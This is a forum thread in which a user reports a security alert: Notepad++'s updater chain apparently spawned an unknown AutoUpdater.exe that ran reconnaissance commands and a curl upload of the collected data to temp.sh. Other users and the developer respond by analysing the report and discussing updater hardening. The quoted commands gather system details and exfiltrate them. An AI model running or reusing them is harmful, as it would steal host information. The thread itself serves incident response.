autoupdater and connection temp.sh
-
Submission for any help regarding a finding that came through from AutoUpdater!?
Malicious command seen:
curl.exe -F "file=@a.txt" -s https://temp[.]sh/uploadThis command appears to be maliciously exfiltrating data in “a.txt” to malicious domain “
https://temp[.]sh/upload”.The activity appears to have started from
notepad++.exeThis then spawned the command:
"C:\\Program Files\\Notepad++\\updater\\gup.exe" -v8.84 -px64Which spawned:
"C:\\Users\\[user]\\AppData\\Local\\Temp\\AutoUpdater.exe" /closeRunningNpp /S /runNppAfterSilentInstallThe hash for “AutoUpdater.exe” is unknown.
Other commands seen:
cmd /c netstat -ano >> a.txt cmd /c systeminfo >> a.txt cmd /c tasklist >> a.txt cmd /c whoami >> a.txtFrom the original malicious command, it appears system information from the user was saved to “a.txt” and then exfiltrated to “
ttps://temp[.]sh/upload” which likely corresponds to blocklisted IP “51[.]91[.]79[.]17”—
moderator added code markdown around text; please don’t forget to use the
</>button to mark example text as “code” or `backticks` aroundinline codeso that characters don’t get changed by the forum -
From my understanding, Notepad++'s
gup.exedoesn’t usecurl.exe, it uses the bundledlibcurl.dll, which shouldn’t ever show up ascurl.exein any process list, as far as I understand things.Further, I cannot find
systeminfoanywhere in the gup codebase, so I really don’t think a valid Notepad++ setup would be trying to make the calls that you’ve shown.@xomx knows a lot more about the gup/wingup than I do, but my initial conclusion is that what you’ve shown doesn’t come from the official Notepad++
gup.exe. (But it’s not unlikely that I’ve misunderstood, and it really would do the things listed above; I just don’t expect it to.)Some possibly-pertinent inforation:
- Where did you download Notepad++ from?
- Did you use https://notepad-plus-plus.org/downloads/ ?
- Or https://github.com/notepad-plus-plus/notepad-plus-plus/releases ?
- Or someplace else? If so, be precise about where (and use ` backticks around any URL, like
`https://some.example/blah`(so that that the forum doesn’t automatically linkify it, to avoid people and crawlers from accidentally following that link)
- What does Notepad++'s ?-menu’s Debug Info say?
- What is the filesize, date, and Properties > Details for
gup.exeandlibcurl.dllandnotepad++.exe?
- Where did you download Notepad++ from?
-
@PeterJones
Notepad++ v8.8.4 (64-bit)
Build time: Aug 4 2025 - 18:01:28
Scintilla/Lexilla included: 5.5.7/5.4.5
Boost Regex included: 1_85
Path: C:\Program Files\Notepad++\notepad++.exe
Command Line:
Admin mode: OFF
Local Conf mode: OFF
Cloud Config: OFF
Periodic Backup: ON
Placeholders: OFF
Scintilla Rendering Mode: SC_TECHNOLOGY_DIRECTWRITE (1)
Multi-instance Mode: monoInst
asNotepad: OFF
File Status Auto-Detection: cdEnabledNew (for current file/tab only)
Dark Mode: OFF
Display Info:
primary monitor: 1920x1080, scaling 100%
visible monitors count: 3
installed Display Class adapters:
0000: Description - Intel® Iris® Xe Graphics
0000: DriverVersion - 32.0.101.6556
0001: Description - DisplayLink USB Device
0001: DriverVersion - 12.1.2424.0
0002: Description - DisplayLink USB Device
0002: DriverVersion - 12.1.2424.0
OS Name: Windows 11 Pro (64-bit)
OS Version: 24H2
OS Build: 26100.6584
Current ANSI codepage: 1252
Plugins:
ColumnsPlusPlus (1.1.2)
CSVLint (0.4.6.7)
JsonTools (8)
mimeTools (3.1)
NppConverter (4.6)
NppExport (0.4)
XMLTools (3.1.1.13) -
@PeterJones
gup.exe : 807,936 byes, created Sunday, August 10, 2025
libcurl.dll : 818,688 bytes, created Sunday, August 10, 2025
notepad++.exe : 8,699,392 bytes , created Sunday, August 10, 2025 -
@soft-parsley said,
Notepad++ v8.8.4 (64-bit)
Build time: Aug 4 2025 - 18:01:28and
gup.exe : 807,936 byes, created Sunday, August 10, 2025
libcurl.dll : 818,688 bytes, created Sunday, August 10, 2025
notepad++.exe : 8,699,392 bytes , created Sunday, August 10, 2025Hmm… Those all match with what I see for a correct Notepad++ v8.8.4.
I don’t know why you would see
curl.exerather thancurl.dll, or the strange URL and AutoUpdater.exe, because I really wouldn’t expect that as normal behavior. I think you’re going to have to wait for @xomx or someone else more knowledgable than I am about the updater process, because the files look right to me, but the activities seem weird, to me. -
Unfortunately, I’ve a bad news for you, if you didn’t somehow initialize all of this yourself, your comp is no longer yours…
t e m p . s h seems to be a kind of non-permanent storage, anyone can use it:
Notepad++ doesn’t distribute/use
curl.exebinary, it uses the curl-library functionality via “C:\Program Files\Notepad++\updater\libcurl.dll” for the N++ updater GUP.exe. And of course N++ never uses such an anonymous storage place.Also you should check the digital signatures of your N++ binaries like:
Moreover, nowadays it isn’t possible to download or update to N++ v8.8.4, as this specific version was withdrawn because it contained regressions.
-
@soft-parsley
Could you provide yourgup.xmlfile fromC:\Program Files\Notepad++\updater\directory? -
@donho I see in v8.8.8 release there was an issue addressed with WinGup. Could you elaborate what caused this behavior?
-
I see in v8.8.8 release there was an issue addressed with WinGup. Could you elaborate what caused this behavior?
Unfortunately I can’t provide more facts than what we already know.
We are not aware of any confirmed exploitation of this vulnerability in the wild.
The fix in v8.8.8 is the best I could do to address the issue of WinGUp being hijacked. -
Thank you for all the work you do, I’m a huge fan of Notepad++, I wanted to confirm a few details due to the heavy usage of Notepad++ in my environment:
Regarding the WinGup fix in v8.8.8, Was the
temp.sh(or similar) exfiltration vector reported in v8.8.4 possible on a clean, official installation of Notepad++?Was administrative privileges on the Windows computer where 8.8.4 is install required to exploit the vulnerability?
You mentioned the fix landed in v8.8.8, but can you confirm if this vulnerability was introduced specifically in v8.8.4 (due to changes in the updater), or were versions prior to 8.8.4 (like 8.8.2/8.8.3) also susceptible to this specific gup.exe hijacking technique? What about 8.8.5-8.8.7?
For users currently running v8.8.4 who want to verify they haven’t been impacted before updating: Aside from monitoring network traffic for
temp.sh, are there specific things we can check for, like modifications to the update xml file or other modified files/logs in the program directory? -
From what I know, this is not directly about a bug/vulnerability in the N++ ecosystem, but rather a preventive security fortification against possible attacks independent of the N++. Namely against the DNS spoofing type of attacks. The upcoming v8.8.9 will bring another such fortification.
